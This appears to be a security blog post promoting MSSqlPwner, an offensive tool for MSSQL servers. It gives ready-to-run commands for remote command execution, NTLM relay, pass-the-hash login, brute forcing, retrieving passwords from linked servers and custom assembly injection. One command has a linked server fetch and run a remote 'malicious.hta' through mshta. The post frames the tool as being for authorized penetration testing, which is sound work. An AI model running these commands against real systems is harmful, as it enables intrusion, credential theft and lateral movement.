MSSqlPwner - Powerful Tool for MSSQL Server Security Testing

MSSqlPwner - Powerful Tool for MSSQL Server Security Testing

MSSqlPwner is a powerful penetration testing tool designed to exploit and assess the security of Microsoft SQL (MSSQL) servers.

Built on the Impacket framework, it supports authentication using clear-text passwords, NTLM hashes, and Kerberos tickets. This guide provides an overview of its features, installation, and usage.

Key Features of MSSqlPwner

  • Command Execution: Execute commands through methods such as xp_cmdshell, sp_oacreate, and custom assemblies.

  • Recursive Enumeration: Automatically enumerate linked servers and impersonation chains to identify potential attack paths.

  • NTLM Relay: Perform NTLM relay attacks using procedures like xp_dirtree, xp_subdirs, and xp_fileexist.

  • Lateral Movement: Explore linked servers and escalate privileges using discovered impersonation chains.

  • Authentication Methods: Supports Windows credentials, MSSQL credentials, NTLM hashes, and Kerberos tickets.

  • Brute Force: Test credentials against multiple hosts using tickets, hashes, or passwords.

Installation

MSSqlPwner can be installed directly from its GitHub repository. Choose one of the following methods:

Using pip

pip install 'mssqlpwner@git+https://github.com/ScorpionesLabs/MSSqlPwner.git'

Using pipx (Recommended)

pipx install 'git+https://github.com/ScorpionesLabs/MSSqlPwner.git'

Once installed, you can start using the tool with the command:

mssqlpwner -hashes ':0CB6948805F797BF2A82807973B89537' 'Administrator'@172.16.2.12 -windows-auth interactive

Usage Examples

Interactive Mode

Run MSSqlPwner interactively for live execution:

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive

Command Execution

Execute commands on the current server or linked servers:

# Execute "hostname" command on the current server

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname


# Execute "hostname" command on a linked server (e.g., SRV01)

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname


# Use sp_oacreate to execute a malicious command on SRV01

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate

NTLM Relay Attacks

Perform NTLM relay attacks to capture or relay credentials:

# Relay NTLM credentials to a target SMB server

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250


# Relay NTLM credentials using a specific chain ID

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id <CHAIN_ID> ntlm-relay 192.168.45.250

Direct Queries

Run SQL queries directly:

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query "SELECT CURRENT_USER"

Password Retrieval

Retrieve passwords from linked servers:

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrieve-password

Brute Force

Test credentials against multiple hosts:

# Use tickets, hashes, and passwords for brute force attacks

mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt


# Use only hashes for brute force attacks

mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt

Advanced Functionalities

Chain Exploration

MSSqlPwner can identify impersonation chains to escalate privileges:

# Enumerate linked servers and impersonation chains

mssqlpwner corp.com/user:lab@192.168.1.65 enumerate


# Set a specific chain ID for execution in interactive mode

mssqlpwner corp.com/user:lab@192.168.1.65 set-chain <CHAIN_ID>

Custom Assembly Injection

Inject custom code into a linked server:

mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth inject-custom-asm SqlInject.dll

Notes on Security and Ethics

MSSqlPwner is intended for use by security professionals in authorized environments only, such as penetration testing engagements or security audits with proper permissions.

Unauthorized use of this tool may violate laws and ethical guidelines.

This guide provides a comprehensive overview of MSSqlPwner's capabilities and usage scenarios for MSSQL server assessments, lateral movement, and privilege escalation tasks in secure environments! You can learn more and Download MSSqlPwner in GitHub.

Upgrade Your Cybersecurity Skills EHA: Learn 150+ Practical Cyber Security Courses Online With Life Time Access - Enroll Here

Back to blog